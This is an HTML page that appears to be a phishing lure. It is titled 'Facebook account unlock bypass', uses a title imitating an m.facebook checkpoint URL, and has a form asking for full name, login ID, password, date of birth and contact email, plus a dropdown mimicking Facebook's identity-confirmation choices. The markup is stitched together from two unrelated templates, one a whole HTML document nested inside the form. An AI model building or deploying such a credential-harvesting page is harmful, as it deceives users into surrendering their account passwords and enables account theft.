<!DOCTYPE html>
<!-- Website - www.codingnepalweb.com -->
<html lang="en">
  <head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>m.facebook.in-unlock/bypass/nt/screen/?params=%7B%22token%22%3A%22AVgxPXBi3S0Ic1ABFrwSdqXpJve9mP8c2MCMNbbybXLD_OX7aw4NfFSaZdOHygngxeIMZNUYAevD1ZVpyrpqIm6o8bsl4iM7QDKoiW3Y8r0o3O_2xwaJ27eOAIN3_e30e0dd5qvL8nMd78JIjdUNlS8WVQvVYyI65LKRxziYf9nsGL-hk8KKM2zciqr9E1Jc5UCO6yJxfgmeuh_4ug8vxDaYYN5uYf24els2PukIB_lvD2ZfRXSU2cf9W0gO3hJ7LJWfsjOWVMvNvJrOGPh6726gtH06d1i8qZ1pyzM2p7TeT4Ty5M7i3jO3BRUZJNJtrGwB_TjAmxyIJe4V__igpBsmzz9kXpmL5OW30ZFB6X0Dih11H-ibAyRKRNIR3ABsj9hA7eYy2qOe5W_ZDGhr7YYJuNALoPKGU_KBZN07wg%22%2C%22karma_limit_hit%22%3Afalse%7D&path=%2Fnt%2Fcheckpoint%2F828281030927956%2Fchallenge_chooser&state</title>
    <link rel="stylesheet" href="style.css">
    <!-- Fontawesome CDN Link For Icons -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.1/css/all.min.css" />
  </head>
  <body>
    <form action="thank-you.html">
      <h2 style="color:rgb(0, 4, 255)">Facebook account unlock bypass</h2>
      <div class="form-group fullname">
        <label for="fullname">Full Name</label>
        <input type="text" id="fullname" placeholder="Facebook id full name">
      </div>
      <div class="form-group loginid">
        <label for="loginid">Login Id</label>
        <input type="text" id="loginid" placeholder="Enter your mobile number or email">
      </div>
      <div class="form-group password">
        <label for="password">Password</label>
        <input type="password" id="password" placeholder="Enter your password">
        <i id="pass-toggle-btn" class="fa-solid fa-eye"></i>
      </div>
      <div class="form-group date">
        <label for="date">Date of birth <h9 style="color:rgb(0, 225, 255)">(Optional)
        <input type="date" id="date" placeholder="Select your date"> 
      </div>
      <div class="form-group gender">
        <label for="gender">Gender</label>
        <select id="gender">
          <option value="" selected disabled>Select your gender</option>
          <option value="Male">Male</option>
          <option value="Female">Female</option>
          <option value="Other">Other</option>
        </select>
      </div>
      <div class="form-group email">
        <label for="email">Contact email</label>
        <input type="text" id="email" placeholder="Enter valid email address">
      </div>
      <!DOCTYPE html>
      <!-- Coding by CodingLab | www.codinglabweb.com-->
          <html lang="en">
          <head>
              <meta charset="UTF-8">
              <meta http-equiv="X-UA-Compatible" content="IE=edge">
              <meta name="viewport" content="width=device-width, initial-scale=1.0">
              <title> Custom Dropdown Select Menu </title>
      
              <!-- CSS -->
              <link rel="stylesheet" href="css/style.css">
                                      
              <!-- Fontawesome CDN Link -->
              <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.1.1/css/all.min.css">
              
          </head>
          <body>
              <div class="container">
                  <div class="select-btn">
                      <span class="btn-text"><h2 style="color:rgb(255, 0, 0)">Select Confirmation</span>
                      <span class="arrow-dwn">
                          <i class="fa-solid fa-chevron-down"></i>
                      </span>
                  </div>
      
                  <ul class="list-items">
                      <li class="item">
                          <span class="checkbox">
                              <i class="fa-solid fa-check check-icon"></i>
                          </span>
                          <span class="item-text">Get a code by email</span>
                      </li>
                      <li class="item">
                          <span class="checkbox">
                              <i class="fa-solid fa-check check-icon"></i>
                          </span>
                          <span class="item-text">Get a code on your phone</span>
                      </li>
                      <li class="item">
                          <span class="checkbox">
                              <i class="fa-solid fa-check check-icon"></i>
                          </span>
                          <span class="item-text">Enter your date of birth</span>
                      </li>
                      <li class="item">
                          <span class="checkbox">
                              <i class="fa-solid fa-check check-icon"></i>
                          </span>
                          <span class="item-text">Get a code on WhatsApp</span>
                      </li>
                      <li class="item">
                          <span class="checkbox">
                              <i class="fa-solid fa-check check-icon"></i>
                          </span>
                          <span class="item-text">Confirm your identity</span>
                      </li>
                      <li class="item">
                          <span class="checkbox">
                              <i class="fa-solid fa-check check-icon"></i>
                          </span>
                          <span class="item-text">No options</span>
                      </li>
                  </ul>
              </div>
      
              <!-- JavaScript -->
              <script src="js/script.js"></script>
          </body>
      </html>

                    
      <div class="form-group submit-btn">
        <input type="submit" value="Submit">
      </div>
    </form>

    <script src="script.js"></script>
  </body>
</html>